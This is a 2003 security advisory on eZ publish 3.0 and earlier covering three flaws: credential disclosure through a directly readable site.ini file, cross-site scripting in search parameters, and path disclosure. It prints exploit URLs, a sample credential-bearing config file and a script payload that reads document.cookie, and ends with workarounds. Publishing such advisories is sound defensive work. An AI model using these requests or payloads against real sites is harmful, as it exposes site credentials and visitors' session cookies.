16th Apr 2003 [SBWID-6157]
COMMAND
Ez publish info & path disclosure and XSS
SYSTEMS AFFECTED
3.0 and prior
PROBLEM
In Security Corporation Security Advisory SCSA-016
[http://www.security-corporation.com/]:
DESCRIPTION
===========
"eZ publish 3 is an open source content management system and
development framework. "
(direct quote from http://www.ez.no)
DETAILS
=======
¤ Sensitive information disclosure :
A security vulnerability was found in Ez publish which allow a remote
attacker to access to sensitive informations such as database's name
and password.
This vulnerability can be triggered by a remote user submitting a
specially crafted HTTP request.
For example, an attacker can download the site.ini file and disclose
numerous informations like this :
---- site.ini -----
[DatabaseSettings]
DatabasePluginPath=
# Use either ezmysql or ezpostgresql
DatabaseImplementation=ezmysql
Server=localhost
User=nextgen
Password=nextgen
Database=nextgen
# Enable slave servers
# The slave servers will only be used for read queries
# Useful for load balanced environments
UseSlaveServer=disabled
#SlaveServerArray[]=localhost
#SlaverServerUser[]=nextgen
#SlaverServerPassword[]=nextgen
#SlaverServerDatabase[]=nextgen
# The number of times to reconnect if the first fails
ConnectRetries=0
Charset=iso-8859-1
# Use charset conversion routines in DB if possible
UseBuiltinEncoding=true
Socket=disabled
SQLOutput=disabled
UsePersistentConnection=disabled
[SiteSettings]
# Name of the site, will be used in default templates in titles.
SiteName=eZ publish
# URL of site, often used to link to site in emails etc.
SiteURL=mysite.com
# List of metadata to set in pagelayout
MetaDataArray[author]=eZ systems
MetaDataArray[copyright]=eZ systems
MetaDataArray[description]=Content Management System
MetaDataArray[keywords]=cms, publish, e-commerce, content management
Dir=
# Which page to show when the root index (/) is accessed
IndexPage=/content/view/sitemap/2/
# What to do when a module does not exists, use either defaultpage or
displayerror
ErrorHandler=displayerror
# Displayed if an error occurs and ErrorHandler is set to defaultpage
DefaultPage=/content/view/sitemap/2/
# Default access is needed when uri type matching is done, this is
# because with empty urls it's not possible to fetch the access
DefaultAccess=demo
# How the login page should be handled, use embedded to show inside default
pagelayout
# or custom for loginpagelayout.tpl
LoginPage=custom
# The SSL port, the default should be OK for most sites but can be
# changed if different. If the port is detect all redirects will
# be done with https protocol.
SSLPort=443
-------------------
¤ Cross Site Scripting :
Many exploitable bugs was found in Ez publish which cause script
execution on client's computer by following a crafted url.
This kind of attack known as "Cross-Site Scripting Vulnerability" is
present in many section of the web site, an attacker can input
specially crafted links and/or other malicious scripts.
¤ Path Disclosure :
Many vulnerabilities have been found in Ez publish which allow
attackers to determine the physical path of the application.
These vulnerabilities would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information. This vulnerability can be triggered by a remote user
submitting a specially crafted HTTP request.
EXPLOITS
========
¤ Sensitive information disclosure :
http://[target]/settings/[file_name]
For example :
http://[target]/settings/site.ini
¤ Cross Site Scripting :
http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]
http://[target]/index.php/content/advancedsearch/?SearchText=[hostile_code]&PhraseSearchText=[hostile_code]&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search
http://[target]/index.php/[any_section]/">[hostile_code]<
http://[target]/index.php/"><script>[hostile_code]<
The hostile code could be :
[script]alert("Cookie="+document.cookie)[/script]
(open a window with the cookie of the visitor.)
(replace [] by <>)
¤ Path Disclosure :
Numerous files of the kernel directory are affected.
http://[target]/kernel/class/delete.php
http://[target]/kernel/class/edit.php
http://[target]/kernel/class/ezcontentclassfeature.php
http://[target]/kernel/class/groupedit.php
http://[target]/kernel/class/grouplist.php
http://[target]/kernel/class/list.php
http://[target]/kernel/class/removeclass.php
http://[target]/kernel/class/removegroup.php
http://[target]/kernel/class/classlist.php
http://[target]/kernel/class/copy.php
http://[target]/kernel/classes/ezorderitem.php
http://[target]/kernel/classes/ezpersistentobject.php
http://[target]/kernel/classes/ezpolicy.php
http://[target]/kernel/classes/ezpolicylimitation.php
http://[target]/kernel/classes/ezpolicylimitationvalue.php
http://[target]/kernel/classes/ezproductcollection.php
http://[target]/kernel/classes/ezproductcollectionitem.php
http://[target]/kernel/classes/ezproductcollectionitemoption.php
http://[target]/kernel/classes/ezrole.php
http://[target]/kernel/classes/ezsearch.php
http://[target]/kernel/classes/ezsearchlog.php
...
SOLUTION
No solution for the moment.
WORKAROUND
==========
¤ Sensitive information disclosure :
We strongly urge you to use a .htaccess file for the sensitive
informations like settings files.
¤ Cross Site Scripting :
Use the function php eregi_replace to filter the input data.
¤ Path Disclosure :
You can fix the path disclosure problem by adding this code in all the
affected files :
-------CUT-------
error_reporting(0);
-------CUT-------